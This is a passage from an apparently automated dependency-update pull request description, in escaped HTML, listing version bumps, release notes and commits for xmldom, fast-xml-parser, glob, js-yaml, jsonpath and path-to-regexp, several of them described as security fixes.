href=\"https://github.com/kboshold\"\u003e\u003ccode\u003e@​kboshold\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/Ponynjaa\"\u003e\u003ccode\u003e@​Ponynjaa\u003c/code\u003e\u003c/a\u003e,\nfor your contributions.\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.9.6...0.9.7\"\u003e0.9.7\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImplementation of \u003ccode\u003ehasAttributes\u003c/code\u003e \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/804\"\u003e\u003ccode\u003e[#804](https://github.com/xmldom/xmldom/issues/804)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003elocator is now true even when other options are being used for the DOMParser \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/802\"\u003e\u003ccode\u003e[#802](https://github.com/xmldom/xmldom/issues/802)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/803\"\u003e\u003ccode\u003e[#803](https://github.com/xmldom/xmldom/issues/803)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/189cb78a83e81e1515880988a399e863a8be85ac\"\u003e\u003ccode\u003e189cb78\u003c/code\u003e\u003c/a\u003e 0.8.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/ed08df7572f4236d4fd88d16063c3fd8f59c7884\"\u003e\u003ccode\u003eed08df7\u003c/code\u003e\u003c/a\u003e fix: XML injection via unsafe CDATA serialization (GHSA-wh4c-j3r5-mjhp) (\u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/968\"\u003e#968\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/a5b929ba008f067eeabb427c38de008e36a92796\"\u003e\u003ccode\u003ea5b929b\u003c/code\u003e\u003c/a\u003e chore: clean up generated test artefacts before running ci-local\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/4e37a205627a08eb64365b13c4e4cce5e86278cb\"\u003e\u003ccode\u003e4e37a20\u003c/code\u003e\u003c/a\u003e ci: run format:check in lint job\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/ac0ac7714f0e5a7bd7aff5c30f7733666cf03982\"\u003e\u003ccode\u003eac0ac77\u003c/code\u003e\u003c/a\u003e chore: ignore generated files when checking formatting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/968c8939438eec2eca1d003b333cd0fc4595c72d\"\u003e\u003ccode\u003e968c893\u003c/code\u003e\u003c/a\u003e chore: add local CI script and format:check script\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/ac40424adfa49429811095bcdaf6598255a81a39\"\u003e\u003ccode\u003eac40424\u003c/code\u003e\u003c/a\u003e fix: preserve trailing whitespace in ProcessingInstruction data (\u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/962\"\u003e#962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/cece7521a3c77da7a10f3fc66521e3e077c9974c\"\u003e\u003ccode\u003ecece752\u003c/code\u003e\u003c/a\u003e chore: add .nvmrc pointing to node version 18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/cbf44d90a40703237d217598fa0bcd88770bfa0b\"\u003e\u003ccode\u003ecbf44d9\u003c/code\u003e\u003c/a\u003e docs: improve links to changes in most recent release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/c0f14011c7cf93af60b2541898065b7136594f6b\"\u003e\u003ccode\u003ec0f1401\u003c/code\u003e\u003c/a\u003e 0.8.11\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.7...0.8.12\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~karfau\"\u003ekarfau\u003c/a\u003e, a new releaser for \u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fast-xml-parser` from 4.2.2 to 5.5.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/releases\"\u003efast-xml-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003efix typins and matcher instance in callbacks\u003c/h2\u003e\n\u003cp\u003ecombine typings file to avoid configuration changes\npass readonly instance of matcher to the call backs to avoid accidental push/pop call\u003c/p\u003e\n\u003ch2\u003efix bugs of entity parsing and value parsing\u003c/h2\u003e\n\u003cp\u003efix: entity expansion limits\nupdate strnum package to 2.2.0\u003c/p\u003e\n\u003ch2\u003efix entity expansion and incorrect replacement and performance\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003esupport onDangerousProperty\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.5\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eupdate dependecies to fix typings\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eintegrate path-expression-matcher\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003esupport path-expression-matcher\u003c/li\u003e\n\u003cli\u003efix: stopNode should not be parsed\u003c/li\u003e\n\u003cli\u003eperformance improvement for stopNode checking\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eSeparate Builder\u003c/h2\u003e\n\u003cp\u003eXML Builder was the part of \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-builder\"\u003efast-xml-parser\u003c/a\u003e for years. But considering that any bug in builder may false-alarm the users who are only using parser and vice-versa, we have decided to split it into a separate package.\u003c/p\u003e\n\u003ch2\u003eMigration\u003c/h2\u003e\n\u003cp\u003eTo migrate to fast-xml-builder;\u003c/p\u003e\n\u003cp\u003eFrom\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport { XMLBuilder } from \u0026quot;fast-xml-parser\u0026quot;;\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eTo\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport  XMLBuilder  from \u0026quot;fast-xml-builder\u0026quot;;\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eXMLBuilder will be removed from current package in any next major version of this library. So better to migrate.\u003c/p\u003e\n\u003ch2\u003esupport strictReservedNames\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.9...v5.3.9\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.9...v5.3.9\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ehandle non-array input for XML builder \u0026amp;\u0026amp; support maxNestedTags\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003esupport maxNestedTags\u003c/li\u003e\n\u003cli\u003ehandle non-array input for XML builder when preserveOrder is true (By \u003ca href=\"https://github.com/Angelopvtac\"\u003eAngelo Coetzee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esave use of js properies\n\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.7...v5.3.8\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.7...v5.3.8\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/CHANGELOG.md\"\u003efast-xml-parser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003c!-- raw HTML omitted --\u003eNote: If you find missing information about particular minor version, that version must have been changed without any functional change in this library.\u003c!-- raw HTML omitted --\u003e\u003c/p\u003e\n\u003cp\u003eNote: Due to some last quick changes on v4, detail of v4.5.3 \u0026amp; v4.5.4 are not updated here. v4.5.4x is the last tag of v4 in github repository. I'm extremely sorry for the confusion\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.9 / 2026-03-23\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ecombine typing files\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e4.5.5 / 2026-03-22\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eapply fixes from v5 (legacy maintenance branch v4-maintenance)\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esupport maxEntityCount\u003c/li\u003e\n\u003cli\u003esupport onDangerousProperty\u003c/li\u003e\n\u003cli\u003esupport maxNestedTags\u003c/li\u003e\n\u003cli\u003ehandle prototype pollution\u003c/li\u003e\n\u003cli\u003efix incorrect entity name replacement\u003c/li\u003e\n\u003cli\u003efix incorrect condition for entity expansion\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.8 / 2026-03-20\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003epass read only matcher in callback\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.7 / 2026-03-19\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix: entity expansion limits\u003c/li\u003e\n\u003cli\u003eupdate strnum package to 2.2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.6 / 2026-03-16\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupdate builder dependency\u003c/li\u003e\n\u003cli\u003efix incorrect regex to replace . in entity name\u003c/li\u003e\n\u003cli\u003efix check for entitiy expansion for lastEntities and html entities too\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.5 / 2026-03-13\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esanitize dangerous tag or attribute name\u003c/li\u003e\n\u003cli\u003eerror on critical property name\u003c/li\u003e\n\u003cli\u003esupport onDangerousProperty option\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.4 / 2026-03-13\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeclare Matcher \u0026amp; Expression as unknown so user is not forced to install path-expression-matcher\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.3 / 2026-03-11\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupgrade builder\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.2 / 2026-03-11\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupdate dependency to fix typings\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.1 / 2026-03-10\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix dependency\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/a8934f903054c582b8ae6a12937fd4b22c380613\"\u003e\u003ccode\u003ea8934f9\u003c/code\u003e\u003c/a\u003e upgrade strnum\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/23d13e40c35386069eec8e28c8bfdaabc3962680\"\u003e\u003ccode\u003e23d13e4\u003c/code\u003e\u003c/a\u003e combine typing files\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/0c0a7dc500983c549c2b1c9e1987dfabc69eddda\"\u003e\u003ccode\u003e0c0a7dc\u003c/code\u003e\u003c/a\u003e update maintenance docs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/a92a665e00c146a4ea3ff7760f3399e5ed51dfc5\"\u003e\u003ccode\u003ea92a665\u003c/code\u003e\u003c/a\u003e pass read only matcher in call back\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/a21c44123cdf0f8fb5b56d33386ed3be4e180953\"\u003e\u003ccode\u003ea21c441\u003c/code\u003e\u003c/a\u003e update package detail\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/239b64aa1fc5c5455ddebbbb54a187eb68c9fdb7\"\u003e\u003ccode\u003e239b64a\u003c/code\u003e\u003c/a\u003e check for min value for entity exapantion options\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/61cb666d13044b483aa495a6c020789f22e670b4\"\u003e\u003ccode\u003e61cb666\u003c/code\u003e\u003c/a\u003e restrict more properties to be unsafe\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/41abd66adc54cbc6ebea615a9f5396d8582afdb1\"\u003e\u003ccode\u003e41abd66\u003c/code\u003e\u003c/a\u003e performance improvement of reading DOCTYPE\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/3dfcd20c8cffc310335510ff72a211be0672a8dd\"\u003e\u003ccode\u003e3dfcd20\u003c/code\u003e\u003c/a\u003e refactor: performance improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/870043e75e78545192bc70950c6286d36c7cdf23\"\u003e\u003ccode\u003e870043e\u003c/code\u003e\u003c/a\u003e update release info\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/4.2.2...v5.5.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `glob` from 10.2.3 to 10.5.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/isaacs/node-glob/blob/main/changelog.md\"\u003eglob's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003echangeglob\u003c/h1\u003e\n\u003ch2\u003e13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMove the CLI program out to a separate package, \u003ccode\u003eglob-bin\u003c/code\u003e.\nInstall that if you'd like to continue using glob from the\ncommand line.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove the unsafe \u003ccode\u003e--shell\u003c/code\u003e option. The \u003ccode\u003e--shell\u003c/code\u003e option is now\nONLY supported on known shells where the behavior can be\nimplemented safely.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e11.1\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2\"\u003eGHSA-5j98-mcp5-4vw2\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd the \u003ccode\u003e--shell\u003c/code\u003e option for the command line, with a warning\nthat this is unsafe. (It will be removed in v12.)\u003c/li\u003e\n\u003cli\u003eAdd the \u003ccode\u003e--cmd-arg\u003c/code\u003e/\u003ccode\u003e-g\u003c/code\u003e as a way to \u003cem\u003esafely\u003c/em\u003e add positional\narguments to the command provided to the CLI tool.\u003c/li\u003e\n\u003cli\u003eDetect commands with space or quote characters on known shells,\nand pass positional arguments to them safely, avoiding\n\u003ccode\u003eshell:true\u003c/code\u003e execution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e11.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDrop support for node before v20\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003eincludeChildMatches: false\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003eExport the \u003ccode\u003eIgnore\u003c/code\u003e class\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003e--default -p\u003c/code\u003e flag to provide a default pattern\u003c/li\u003e\n\u003cli\u003eexclude symbolic links to directories when \u003ccode\u003efollow\u003c/code\u003e and \u003ccode\u003enodir\u003c/code\u003e\nare both set\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd glob cli\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReturn \u003ccode\u003e'.'\u003c/code\u003e instead of the empty string \u003ccode\u003e''\u003c/code\u003e when the current\nworking directory is returned as a match.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eposix: true\u003c/code\u003e option to return \u003ccode\u003e/\u003c/code\u003e delimited paths, even on\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/56774ef73b495eb0b17cdd0f42921f5ef62297c1\"\u003e\u003ccode\u003e56774ef\u003c/code\u003e\u003c/a\u003e 10.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\"\u003e\u003ccode\u003e1e4e297\u003c/code\u003e\u003c/a\u003e bin: Do not expose filenames to shell expansion\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1f0c1ca01a5f256cd17f543f83e9aaeedd133939\"\u003e\u003ccode\u003e1f0c1ca\u003c/code\u003e\u003c/a\u003e 10.4.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/eaf31dcb144750a19842a8319c330d021d4c4d5f\"\u003e\u003ccode\u003eeaf31dc\u003c/code\u003e\u003c/a\u003e whatever, just allow any engines\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/78275168e1bbc7a61e372af1ba58307c27faf0cb\"\u003e\u003ccode\u003e7827516\u003c/code\u003e\u003c/a\u003e 10.4.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/d06c8f8c8288c89a4892f4ebcc23ca21840aa4a1\"\u003e\u003ccode\u003ed06c8f8\u003c/code\u003e\u003c/a\u003e restore support for node 14.latest and 16.latest\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/c14b787771f269651f27f6207aaf410fe171f0b6\"\u003e\u003ccode\u003ec14b787\u003c/code\u003e\u003c/a\u003e 10.4.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/8a69def3cad0de9ba26ca831065ffe448d153de3\"\u003e\u003ccode\u003e8a69def\u003c/code\u003e\u003c/a\u003e node 14 no longer supported\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/eef7ea35afe511079c5bf83862ed57ece2bbf7fa\"\u003e\u003ccode\u003eeef7ea3\u003c/code\u003e\u003c/a\u003e 10.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/c76a7d255c74133ed33dd7aa965598316d12dd25\"\u003e\u003ccode\u003ec76a7d2\u003c/code\u003e\u003c/a\u003e use package-json-from-dist to look up package.json\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/node-glob/compare/v10.2.3...v10.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jsonpath` from 1.1.1 to 1.3.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/dchester/jsonpath/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 6.2.1 to 6.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eFix backtracking in 